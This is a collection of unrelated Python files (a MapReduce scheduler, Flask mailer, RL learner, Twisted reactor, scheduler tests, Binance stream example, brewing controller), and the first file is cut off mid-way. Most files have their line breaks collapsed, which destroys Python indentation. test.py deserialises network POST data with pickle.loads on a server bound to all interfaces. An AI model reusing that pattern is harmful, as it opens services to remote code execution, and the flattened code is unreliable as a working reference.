        time.sleep(1)                          # Wait for 1s before checking again.
# Thread 1 addresses Job Requests def addressRequests(): global job_count while(1): try: conn, addr = jRSocket.accept() except: break r = conn.recv(1024) # Read job request req = "" while r: # If len(req) > 1024b req += r.decode() r = conn.recv(1024) request = json.loads(req) conn.close() job_count_lock.acquire() job_count += 1 job_count_lock.release() job_logs[request['job_id']] = time.time() # Record job start time scheduling_pool_lock.acquire() # Add job to scheduling_pool scheduling_pool[request['job_id']] = [request['reduce_tasks'], [i['task_id'] for i in request['map_tasks']]] scheduling_pool_lock.release() pickScheduler(request['job_id'], request['map_tasks'], 'M') # Schedule m_tasks based on algo def updateSlots(): global job_count while(1): try: conn,addr = jUSocket.accept() except: break u = conn.recv(1024).decode() # Read task completion info update = "" while(len(u)!=0): update += u u = conn.recv(1024).decode() update = json.loads(update) end_time = time.time() # Record end time and add to task log task_logs[update['task_id']][0] = end_time - task_logs[update['task_id']][0] config_lock.acquire() config[update['w_id']-1][1]+=1 # Increment free slots on resp. worker config_lock.release() if(update['job_type'] == 'M'): # If it was a map task scheduling_pool_lock.acquire() scheduling_pool[update['job_id']][1].remove(update['task_id']) # Remove from resp job's m_task list scheduling_pool_lock.release() ''' if(len(scheduling_pool[update['job_id']][1]) == 0): random(update['job_id'], scheduling_pool[update['job_id']][0], 'R') ''' else: # If it was a reduce task for task in scheduling_pool[update['job_id']][0]: if task['task_id'] == update['task_id']: scheduling_pool_lock.acquire() scheduling_pool[update['job_id']][0].remove(task) # Remove from resp job's r_task list scheduling_pool_lock.release() break if(len(scheduling_pool[update['job_id']][0]) == 0): # If no more r_tasks in resp job # Job completed print("\n===========================================================================\n") print("\t\t\t ******** COMPLETED JOB ", update['job_id'], "*********") print("\n===========================================================================\n") job_logs[update['job_id']] = end_time - job_logs[update['job_id']] # Update duration of job scheduling_pool_lock.acquire() scheduling_pool.pop(update['job_id']) # Remove job from scheduling_pool scheduling_pool_lock.release() job_count_lock.acquire() job_count -= 1 job_count_lock.release() if(len(scheduling_pool)==0): #if(job_count == 0): # Can use any If print("\n===========================================================================\n") print("\nTASK LOGS:\n", task_logs) print("\nJOB LOGS:\n", job_logs) print("\n===========================================================================\n") print("\n\n############################################################################") print("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< EXIT >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>") print("############################################################################\n") conn.close() # Initialize Configuration. 
config = initConfig()
config_lock = threading.Lock()
print(config)

# Initialize Sockets
# 5000 - Listen to Job requests
# 5001 - Listen to Job updates
# config[i][2] - Launch Tasks on Worker i
jRSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
jRSocket.bind(("localhost", 5000))
jRSocket.listen(1)

jUSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
jUSocket.bind(("localhost", 5001))
jUSocket.listen(3)

taskLaunchSocket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
taskLaunchSocket1.bind(("localhost", config[0][2]))
taskLaunchSocket1.listen(1)

taskLaunchSocket2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
taskLaunchSocket2.bind(("localhost", config[1][2]))
taskLaunchSocket2.listen(1)

taskLaunchSocket3 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
taskLaunchSocket3.bind(("localhost", config[2][2]))
taskLaunchSocket3.listen(1)

# Initialize time logs
job_logs = {}    # <job_id> : time
task_logs = {}   # <task_id> : [time, worker]

job_count = 0
job_count_lock = threading.Lock()

# Initialize shared data structure.
# Keeps record of job requests yet to complete exec
# Used to track map task completion.
# Removes task from task list on completion.
# If len(map_tasks) == 0, launch reduce tasks.
scheduling_pool = {}   # {job_id : [ [r_tasks {dict of id and dur}], [m_tasks {list of task ids}] ], ...}
scheduling_pool_lock = threading.Lock()

t1 = threading.Thread(target = addressRequests, name = "Thread1")   # Listens to Job Requests and schedules
t2 = threading.Thread(target = updateSlots, name = "Thread2")       # Listens to updates on Task Completion
t3 = threading.Thread(target = monitorReduce, name = "Thread3")     # Checks for completed m_tasks to launch r_tasks

t1.start()
t2.start()
t3.start()

t1.join()
t2.join()
t3.join()

print(config)

jRSocket.close()
jUSocket.close()
# Close each task-launch socket; there is no single 'taskLaunchSocket' object
taskLaunchSocket1.close()
taskLaunchSocket2.close()
taskLaunchSocket3.close()
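# --- Hypothetical config example (not part of this script) ---
# initConfig() reads the JSON file given as sys.argv[1] and only relies on each
# worker mapping's values() coming out in (id, slots, port) order, so the key
# names below are illustrative assumptions rather than a prescribed schema:
#
#   {
#       "workers": [
#           {"worker_id": 1, "slots": 5, "port": 4000},
#           {"worker_id": 2, "slots": 5, "port": 4001},
#           {"worker_id": 3, "slots": 5, "port": 4002}
#       ]
#   }
#
# Example invocation (sys.argv[2] selects the scheduler: "random", "rr", or
# anything else for least-loaded):
#
#   python master.py config.json rr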
email.py
# -*- coding:utf-8 -*- from threading import Thread from flask import current_app, render_template from flask_mail import Message from . import mail def send_async_email(app, msg): with app.app_context(): mail.send(msg) def send_email(to, subject, template, **kwargs): app = current_app._get_current_object() msg = Message(app.config['CASEMGR_MAIL_SUBJECT_PREFIX'] + ' ' + subject, sender=app.config['CASEMGR_MAIL_SENDER'], recipients=[to]) msg.body = render_template(template + '.txt', **kwargs) msg.html = render_template(template + '.html', **kwargs) thr = Thread(target=send_async_email, args=[app, msg]) thr.start() return thr
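# --- Usage sketch (illustrative, not part of the original module) ---
# send_email() must be called with an application context available (e.g. from
# a view or CLI command) and returns the worker thread, so callers can
# optionally join() it. The template name 'email/confirmation' and the 'user'
# keyword below are assumptions; they must match templates that
# render_template() can resolve as '<name>.txt' and '<name>.html'.
def send_confirmation_email(user_email, user):
    thr = send_email(user_email, 'Please confirm your account',
                     'email/confirmation', user=user)
    thr.join(timeout=10)  # optional: block briefly, useful in tests
    return thr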
learner.py
#!/usr/bin/env python # -*- coding: utf-8 -*- " The code for the learner in the actor-learner mode in the IMPALA architecture" # modified from AlphaStar pseudo-code import os import traceback from time import time, sleep, strftime, localtime import threading import itertools import torch from torch.optim import Adam, RMSprop from alphastarmini.core.rl.rl_loss import loss_function from alphastarmini.lib.hyper_parameters import Arch_Hyper_Parameters as AHP from alphastarmini.lib.hyper_parameters import RL_Training_Hyper_Parameters as THP __author__ = "Ruo-Ze Liu" debug = False # model path MODEL = "rl" MODEL_PATH = "./model/" if not os.path.exists(MODEL_PATH): os.mkdir(MODEL_PATH) SAVE_PATH = os.path.join(MODEL_PATH, MODEL + "_" + strftime("%y-%m-%d_%H-%M-%S", localtime())) class Learner: """Learner worker that updates agent parameters based on trajectories.""" def __init__(self, player, max_time_for_training=60 * 3): self.player = player self.player.set_learner(self) self.trajectories = [] # AlphaStar code #self.optimizer = AdamOptimizer(learning_rate=3e-5, beta1=0, beta2=0.99, epsilon=1e-5) # PyTorch code self.optimizer = Adam(self.get_parameters(), lr=THP.learning_rate, betas=(THP.beta1, THP.beta2), eps=THP.epsilon, weight_decay=THP.weight_decay) self.thread = threading.Thread(target=self.run, args=()) self.thread.daemon = True # Daemonize thread self.max_time_for_training = max_time_for_training self.is_running = False self.is_rl_training = True def get_parameters(self): return self.player.agent.get_parameters() def send_trajectory(self, trajectory): self.trajectories.append(trajectory) def update_parameters(self): trajectories = self.trajectories[:AHP.batch_size] self.trajectories = self.trajectories[AHP.batch_size:] if 0 and self.is_rl_training: agent = self.player.agent print("begin backward") if debug else None # a error: cudnn RNN backward can only be called in training mode agent.agent_nn.model.train() #torch.backends.cudnn.enabled = False self.optimizer.zero_grad() with torch.autograd.set_detect_anomaly(True): loss = loss_function(agent, trajectories) print("loss:", loss) if debug else None loss.backward() self.optimizer.step() print("end backward") if debug else None # we use new ways to save # torch.save(agent.agent_nn.model, SAVE_PATH + "" + ".pkl") torch.save(agent.agent_nn.model.state_dict(), SAVE_PATH + "" + ".pth") agent.steps += AHP.batch_size * AHP.sequence_length # num_steps(trajectories) # self.player.agent.set_weights(self.optimizer.minimize(loss)) def start(self): self.thread.start() # background def run(self): try: start_time = time() self.is_running = True while time() - start_time < self.max_time_for_training: try: # if at least one actor is running, the learner would not stop actor_is_running = False if len(self.player.actors) == 0: actor_is_running = True for actor in self.player.actors: if actor.is_start: actor_is_running = actor_is_running | actor.is_running else: actor_is_running = actor_is_running | 1 if actor_is_running: print('learner trajectories size:', len(self.trajectories)) if len(self.trajectories) >= AHP.batch_size: print("learner begin to update parameters") self.update_parameters() sleep(1) else: print("Actor stops!") print("Learner also stops!") return except Exception as e: print("Learner.run() Exception cause break, Detials of the Exception:", e) print(traceback.format_exc()) break except Exception as e: print("Learner.run() Exception cause return, Detials of the Exception:", e) finally: self.is_running = False def test(on_server): pass
_threadedselect.py
# -*- test-case-name: twisted.test.test_internet -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Threaded select reactor The threadedselectreactor is a specialized reactor for integrating with arbitrary foreign event loop, such as those you find in GUI toolkits. There are three things you'll need to do to use this reactor. Install the reactor at the beginning of your program, before importing the rest of Twisted:: | from twisted.internet import _threadedselect | _threadedselect.install() Interleave this reactor with your foreign event loop, at some point after your event loop is initialized:: | from twisted.internet import reactor | reactor.interleave(foreignEventLoopWakerFunction) | self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop) Instead of shutting down the foreign event loop directly, shut down the reactor:: | from twisted.internet import reactor | reactor.stop() In order for Twisted to do its work in the main thread (the thread that interleave is called from), a waker function is necessary. The waker function will be called from a "background" thread with one argument: func. The waker function's purpose is to call func() from the main thread. Many GUI toolkits ship with appropriate waker functions. Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter. These would be used in place of "foreignEventLoopWakerFunction" in the above example. The other integration point at which the foreign event loop and this reactor must integrate is shutdown. In order to ensure clean shutdown of Twisted, you must allow for Twisted to come to a complete stop before quitting the application. Typically, you will do this by setting up an after shutdown trigger to stop your foreign event loop, and call reactor.stop() where you would normally have initiated the shutdown procedure for the foreign event loop. Shutdown functions that could be used in place of "foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function. """ from functools import partial from threading import Thread from queue import Queue, Empty import sys from zope.interface import implementer from twisted.internet.interfaces import IReactorFDSet from twisted.internet import posixbase from twisted.internet.posixbase import _NO_FILENO, _NO_FILEDESC from twisted.python import log, failure, threadable import select from errno import EINTR, EBADF from twisted.internet.selectreactor import _select def dictRemove(dct, value): try: del dct[value] except KeyError: pass def raiseException(e): raise e @implementer(IReactorFDSet) class ThreadedSelectReactor(posixbase.PosixReactorBase): """A threaded select() based reactor - runs on all POSIX platforms and on Win32. 
""" def __init__(self): threadable.init(1) self.reads = {} self.writes = {} self.toThreadQueue = Queue() self.toMainThread = Queue() self.workerThread = None self.mainWaker = None posixbase.PosixReactorBase.__init__(self) self.addSystemEventTrigger("after", "shutdown", self._mainLoopShutdown) def wakeUp(self): # we want to wake up from any thread self.waker.wakeUp() def callLater(self, *args, **kw): tple = posixbase.PosixReactorBase.callLater(self, *args, **kw) self.wakeUp() return tple def _sendToMain(self, msg, *args): self.toMainThread.put((msg, args)) if self.mainWaker is not None: self.mainWaker() def _sendToThread(self, fn, *args): self.toThreadQueue.put((fn, args)) def _preenDescriptorsInThread(self): log.msg("Malformed file descriptor found. Preening lists.") readers = self.reads.keys() writers = self.writes.keys() self.reads.clear() self.writes.clear() for selDict, selList in ((self.reads, readers), (self.writes, writers)): for selectable in selList: try: select.select([selectable], [selectable], [selectable], 0) except BaseException: log.msg("bad descriptor %s" % selectable) else: selDict[selectable] = 1 def _workerInThread(self): try: while 1: fn, args = self.toThreadQueue.get() fn(*args) except SystemExit: pass # Exception indicates this thread should exit except BaseException: f = failure.Failure() self._sendToMain("Failure", f) def _doSelectInThread(self, timeout): """Run one iteration of the I/O monitor loop. This will run all selectables who had input or output readiness waiting for them. """ reads = self.reads writes = self.writes while 1: try: r, w, ignored = _select(reads.keys(), writes.keys(), [], timeout) break except ValueError: # Possibly a file descriptor has gone negative? log.err() self._preenDescriptorsInThread() except TypeError: # Something *totally* invalid (object w/o fileno, non-integral # result) was passed log.err() self._preenDescriptorsInThread() except OSError as se: # select(2) encountered an error if se.args[0] in (0, 2): # windows does this if it got an empty list if (not reads) and (not writes): return else: raise elif se.args[0] == EINTR: return elif se.args[0] == EBADF: self._preenDescriptorsInThread() else: # OK, I really don't know what's going on. Blow up. raise self._sendToMain("Notify", r, w) def _process_Notify(self, r, w): reads = self.reads writes = self.writes _drdw = self._doReadOrWrite _logrun = log.callWithLogger for selectables, method, dct in ((r, "doRead", reads), (w, "doWrite", writes)): for selectable in selectables: # if this was disconnected in another thread, kill it. if selectable not in dct: continue # This for pausing input when we're not ready for more. 
_logrun(selectable, _drdw, selectable, method, dct) def _process_Failure(self, f): f.raiseException() _doIterationInThread = _doSelectInThread def ensureWorkerThread(self): if self.workerThread is None or not self.workerThread.isAlive(): self.workerThread = Thread(target=self._workerInThread) self.workerThread.start() def doThreadIteration(self, timeout): self._sendToThread(self._doIterationInThread, timeout) self.ensureWorkerThread() msg, args = self.toMainThread.get() getattr(self, "_process_" + msg)(*args) doIteration = doThreadIteration def _interleave(self): while self.running: self.runUntilCurrent() t2 = self.timeout() t = self.running and t2 self._sendToThread(self._doIterationInThread, t) yield None msg, args = self.toMainThread.get_nowait() getattr(self, "_process_" + msg)(*args) def interleave(self, waker, *args, **kw): """ interleave(waker) interleaves this reactor with the current application by moving the blocking parts of the reactor (select() in this case) to a separate thread. This is typically useful for integration with GUI applications which have their own event loop already running. See the module docstring for more information. """ self.startRunning(*args, **kw) loop = self._interleave() def mainWaker(waker=waker, loop=loop): waker(partial(next, loop)) self.mainWaker = mainWaker next(loop) self.ensureWorkerThread() def _mainLoopShutdown(self): self.mainWaker = None if self.workerThread is not None: self._sendToThread(raiseException, SystemExit) self.wakeUp() try: while 1: msg, args = self.toMainThread.get_nowait() except Empty: pass self.workerThread.join() self.workerThread = None try: while 1: fn, args = self.toThreadQueue.get_nowait() if fn is self._doIterationInThread: log.msg("Iteration is still in the thread queue!") elif fn is raiseException and args[0] is SystemExit: pass else: fn(*args) except Empty: pass def _doReadOrWrite(self, selectable, method, dict): try: why = getattr(selectable, method)() handfn = getattr(selectable, "fileno", None) if not handfn: why = _NO_FILENO elif handfn() == -1: why = _NO_FILEDESC except BaseException: why = sys.exc_info()[1] log.err() if why: self._disconnectSelectable(selectable, why, method == "doRead") def addReader(self, reader): """Add a FileDescriptor for notification of data available to read.""" self._sendToThread(self.reads.__setitem__, reader, 1) self.wakeUp() def addWriter(self, writer): """Add a FileDescriptor for notification of data available to write.""" self._sendToThread(self.writes.__setitem__, writer, 1) self.wakeUp() def removeReader(self, reader): """Remove a Selectable for notification of data available to read.""" self._sendToThread(dictRemove, self.reads, reader) def removeWriter(self, writer): """Remove a Selectable for notification of data available to write.""" self._sendToThread(dictRemove, self.writes, writer) def removeAll(self): return self._removeAll(self.reads, self.writes) def getReaders(self): return list(self.reads.keys()) def getWriters(self): return list(self.writes.keys()) def stop(self): """ Extend the base stop implementation to also wake up the select thread so that C{runUntilCurrent} notices the reactor should stop. 
""" posixbase.PosixReactorBase.stop(self) self.wakeUp() def run(self, installSignalHandlers=True): self.startRunning(installSignalHandlers=installSignalHandlers) self.mainLoop() def mainLoop(self): q = Queue() self.interleave(q.put) while self.running: try: q.get()() except StopIteration: break def install(): """Configure the twisted mainloop to be run using the select() reactor.""" reactor = ThreadedSelectReactor() from twisted.internet.main import installReactor installReactor(reactor) return reactor __all__ = ["install"]
test.py
from flask import Flask, request import requests from threading import Thread import time, pickle def start_server(): app = Flask(__name__) @app.route('/test', methods=['POST']) def test(): print(pickle.loads(request.get_data())) return "", 200 app.run(host='0.0.0.0', port=3000) try: server = Thread(target=start_server) server.daemon = True server.start() requests.post('http://127.0.0.1:3000/test', data=pickle.dumps({b'123': b'456'})) while True: time.sleep(1) except (KeyboardInterrupt, SystemExit): exit()
test_schedule_planner.py
import logging import time from threading import Thread from unittest import TestCase from unittest.mock import MagicMock import schedule import databay from databay import Link from databay.errors import MissingLinkError from databay.planners import SchedulePlanner from databay.planners.schedule_planner import ScheduleIntervalError from test_utils import fqname, DummyException, DummyUnusualException class TestSchedulePlanner(TestCase): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) logging.getLogger('databay').setLevel(logging.WARNING) def setUp(self): self.planner = SchedulePlanner(refresh_interval=0.02) link = MagicMock(spec=Link) def set_job(job): link.job = job link.interval.total_seconds.return_value = 0.02 link.set_job.side_effect = set_job link.job = None link.immediate_transfer = True self.link = link def tearDown(self): if len(schedule.jobs) > 0: schedule.clear() def test__run_job(self): self.planner._create_thread_pool() self.planner._run_job(self.link) self.link.transfer.assert_called_once() self.planner._destroy_thread_pool() def test__schedule(self): self.planner._schedule(self.link) self.assertIsNotNone(self.link.job, 'Link should contain a job') schedule_job = schedule.jobs[0] self.assertEqual(self.link.job, schedule_job, 'Link\'s job should be same as schedule\'s') # self.planner._unschedule(link) def test__unschedule(self): self.planner._schedule(self.link) self.planner._unschedule(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertEqual(len(schedule.jobs), 0, 'Schedule should not have any jobs') def test__unschedule_invalid(self): self.planner._unschedule(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertEqual(len(schedule.jobs), 0, 'Scheduler should not have any jobs') def test_add_links(self): self.planner.add_links(self.link) self.assertIsNotNone(self.link.job, 'Link should contain a job') self.assertTrue(self.link in self.planner.links, 'Planner should contain the link') def test_add_links_on_init(self): self.planner = SchedulePlanner(self.link, refresh_interval=0.02) self.assertIsNotNone(self.link.job, 'Link should contain a job') self.assertTrue(self.link in self.planner.links, 'Planner should contain the link') def test_remove_links(self): self.planner.add_links(self.link) self.planner.remove_links(self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertTrue(self.link not in self.planner.links, 'Planner should not contain the link') def test_remove_invalid_link(self): self.assertRaises(MissingLinkError, self.planner.remove_links, self.link) self.assertIsNone(self.link.job, 'Link should not contain a job') self.assertTrue(self.link not in self.planner.links, 'Planner should not contain the link') def test_start(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_start_when_already_running(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') th2 = Thread(target=self.planner.start, daemon=True) th2.start() self.assertFalse(th2.is_alive(), 'Starting again should instantly exit.') self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_shutdown(self): th = Thread(target=self.planner.start, daemon=True) 
th.start() self.planner.shutdown() self.assertFalse(self.planner._running, 'Planner should be not running') self.assertIsNone(self.planner._thread_pool, 'Planner should not have a thread pool') th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_add_and_run(self): self.link.interval.total_seconds.return_value = 0.02 self.planner._refresh_interval = 0.02 self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) self.link.transfer.assert_called() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_invalid_interval(self): self.link.interval.total_seconds.return_value = 0.1 self.planner._refresh_interval = 0.2 self.assertRaises(ScheduleIntervalError, self.planner.add_links, self.link) def _with_exception(self, link, ignore_exceptions): self.planner = SchedulePlanner(ignore_exceptions=ignore_exceptions) self.planner.immediate_transfer = False # otherwise planner will never start link.transfer.side_effect = DummyException() link.interval.total_seconds.return_value = 0.02 self.planner._refresh_interval = 0.02 link.transfer.side_effect = DummyException() link.interval.total_seconds.return_value = 0.02 self.planner.add_links(link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) link.transfer.assert_called() if ignore_exceptions: self.assertTrue(self.planner.running, 'Planner should be running') self.planner.shutdown(wait=False) th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') self.assertFalse(self.planner.running, 'Planner should be stopped') self.assertTrue( 'I\'m a dummy exception' in ';'.join(cm.output)) def test_ignore_exception(self): self._with_exception(self.link, True) def test_raise_exception(self): self._with_exception(self.link, False) def test_uncommon_exception(self): self.link.transfer.side_effect = DummyUnusualException( argA=123, argB=True) self.link.interval.total_seconds.return_value = 0.02 self.planner.add_links(self.link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.04) self.link.transfer.assert_called() self.assertFalse(self.planner.running, 'Scheduler should be stopped') self.assertTrue( '123, True, I\'m an unusual dummy exception' in ';'.join(cm.output)) def test_purge(self): self.link.interval.total_seconds.return_value = 0.02 self.planner.add_links(self.link) self.planner.purge() self.link.set_job.assert_called_with(None) self.assertEqual(self.planner.links, []) self.assertEqual(schedule.jobs, []) def test_purge_while_running(self): self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() self.planner.purge() self.link.set_job.assert_called_with(None) self.assertEqual(self.planner.links, []) self.assertEqual(schedule.jobs, []) self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_start_when_already_running(self): th = Thread(target=self.planner.start, daemon=True) th.start() self.assertTrue(self.planner._running, 'Planner should be running') th2 = Thread(target=self.planner._start_planner, daemon=True) th2.start() # this shouldn't do anything as we're already running th2.join() self.assertFalse(th2.is_alive(), 'Second start thread should have exited.') 
self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_immediate_transfer(self): self.link.interval.total_seconds.return_value = 10 self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.01) self.link.transfer.assert_called_once() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') def test_immediate_transfer_exception(self): self.link.interval.total_seconds.return_value = 10 self.planner._ignore_exceptions = False self.link.transfer.side_effect = DummyException('First transfer exception!') self.planner.add_links(self.link) with self.assertLogs(logging.getLogger('databay.BasePlanner'), level='WARNING') as cm: th = Thread(target=self.planner.start, daemon=True) th.start() self.link.transfer.assert_called_once() self.assertFalse(self.planner.running, 'Planner should not have started') th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.') self.assertTrue( 'First transfer exception!' in ';'.join(cm.output)) def test_immediate_transfer_off(self): self.link.interval.total_seconds.return_value = 10 self.planner.immediate_transfer = False self.planner.add_links(self.link) th = Thread(target=self.planner.start, daemon=True) th.start() time.sleep(0.01) self.link.transfer.assert_not_called() self.planner.shutdown() th.join(timeout=2) self.assertFalse(th.is_alive(), 'Thread should be stopped.')
example_binance_us.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # File: example_binance_us.py # # Part of ‘UNICORN Binance WebSocket API’ # Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html # Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api # Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech # PyPI: https://pypi.org/project/unicorn-binance-websocket-api/ # # Author: LUCIT Systems and Development # # Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner # All rights reserved. # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, dis- # tribute, sublicense, and/or sell copies of the Software, and to permit # persons to whom the Software is furnished to do so, subject to the fol- # lowing conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL- # ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT # SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, # WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS # IN THE SOFTWARE. from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager import logging import time import threading import os def print_stream_data_from_stream_buffer(binance_websocket_api_manager): while True: if binance_websocket_api_manager.is_manager_stopping(): exit(0) oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer() if oldest_stream_data_from_stream_buffer is False: time.sleep(0.01) logging.getLogger("unicorn_binance_websocket_api") logging.basicConfig(level=logging.INFO, filename=os.path.basename(__file__) + '.log', format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}", style="{") # create instance of BinanceWebSocketApiManager for Binance Jersey binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.us") userdata_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!userData"], api_key="aaa", api_secret="bb") ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"]) miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"]) markets = {'btcusd', 'btcxrp', 'ethusd', 'bnbusd', 'busdusd'} binance_websocket_api_manager.create_stream(["aggTrade"], markets) binance_websocket_api_manager.create_stream(["trade"], markets) binance_websocket_api_manager.create_stream(["kline_1m"], markets) binance_websocket_api_manager.create_stream(["kline_5m"], markets) binance_websocket_api_manager.create_stream(["kline_15m"], markets) binance_websocket_api_manager.create_stream(["kline_1h"], markets) binance_websocket_api_manager.create_stream(["kline_12h"], markets) binance_websocket_api_manager.create_stream(["kline_1w"], markets) binance_websocket_api_manager.create_stream(["ticker"], markets) binance_websocket_api_manager.create_stream(["miniTicker"], markets) 
binance_websocket_api_manager.create_stream(["depth"], markets) binance_websocket_api_manager.create_stream(["depth5"], markets) binance_websocket_api_manager.create_stream(["depth10"], markets) binance_websocket_api_manager.create_stream(["depth20"], markets) binance_websocket_api_manager.create_stream(["aggTrade"], markets) channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w', 'miniTicker', 'depth20'} binance_websocket_api_manager.create_stream(channels, markets) # start a worker process to move the received stream_data from the stream_buffer to a print function worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,)) worker_thread.start() # show an overview while True: binance_websocket_api_manager.print_summary() time.sleep(1)
Program.py
from PyQt4.QtCore import * # Qt core from PyQt4.QtGui import * # Qt GUI interface from PyQt4.uic import * # ui files realizer from PyQt4 import QtGui, uic from operator import methodcaller import threading import time # # simple machine for running a mash program # # the machine consumes a text file with commands # # tm <temp> set mash setpoint to temperature <temp>. Will cause error if the HLT is colder than <temp> # th <temp> set HLT setpoint to temperature <temp> # wait_time <seconds> wait for <seconds> seconds, then continue # stepname <text> displays the <text> as step name in the gui # wait_tm <temp> wait until mash temp is <temp> # wait_th <temp> wait until hlt temp is <temp> # beep sound the alarm # requester <text> show a requester with text and wait for the user to click OK class MyTableModel(QAbstractTableModel): def __init__(self, datain, parent=None, *args): QAbstractTableModel.__init__(self, parent, *args) self.arraydata = datain def rowCount(self, parent): return len(self.arraydata) def columnCount(self, parent): return len(self.arraydata[0]) def data(self, index, role): #print(index) if not index.isValid(): return QVariant() elif role != Qt.DisplayRole: return QVariant() return QVariant(self.arraydata[index.row()][index.column()]) class Program: oldstep=-1 step=-1 running = False runprogram = True waittime=time.time()+10 waittemp=False xdata = {} ydata = {} xdata["HLT"] = [] ydata["HLT"] = [] xdata["MLT"] = [] ydata["MLT"] = [] xdata["MLTSET"] = [] ydata["MLTSET"] = [] xdata["HLTSET"] = [] ydata["HLTSET"] = [] def execute_program(self): print("start program thread") while self.runprogram: time.sleep(0.1) if self.running and self.bt.serialAvailable(): if self.waittime>time.time(): continue if self.waittemp: if self.bt.getTemp(self.waittemp[0][1])<self.waittemp[1]: continue else: self.waittemp=False print "done waiting for temp" print(self.nextstep()) command = self.program[self.step][0] argument = self.program[self.step][1] alls = self.bt.getFullStatus() self.plot.annotate(alls["timestamp"],int(argument),command) if command in {"th","tm"}: print("setpoint "+command) self.bt.setSetpoint(command[1],argument) elif command in {"wait_th","wait_tm"}: print("waiting "+command) self.waittemp=[command.split("_")[1],argument] elif command=="wait_time": self.waittime = time.time()+int(argument) elif command=="autotune": print ("Autotuning - exiting program control") self.bt.autotune() self.runprogram=False else: print("fel error in program") self.runprogram=False def __init__(self, w, bt,plot,table): self.plot = plot self.bt = bt self.program = list() self.tableWidget = table self.thread = threading.Thread(target=self.execute_program) self.thread.start() def load(self,filename): with open(filename) as f: self.program = map(methodcaller("split", " "), f.read().splitlines()) #print(self.program) self.tablemodel = MyTableModel(self.program) self.tableWidget.setModel(self.tablemodel) #self.tableWidget.layoutChanged.emit() self.step = -1 self.oldstep = -1 self.tableWidget.setDisabled(1) def stopalarm(self): # code to change the alarm indicator back to inactive self.bt.stopAlarm() def nextstep(self): self.step = self.step + 1; if(self.step>=len(self.program)): self.step=-1 self.running=False return list() else: self.tableWidget.selectRow(self.step) return self.program[self.step] def update(self): # need to update the progress bars and display which step is active # change this fullstatus = self.bt.getFullStatus() # print ("step" + str(brewstep)) 
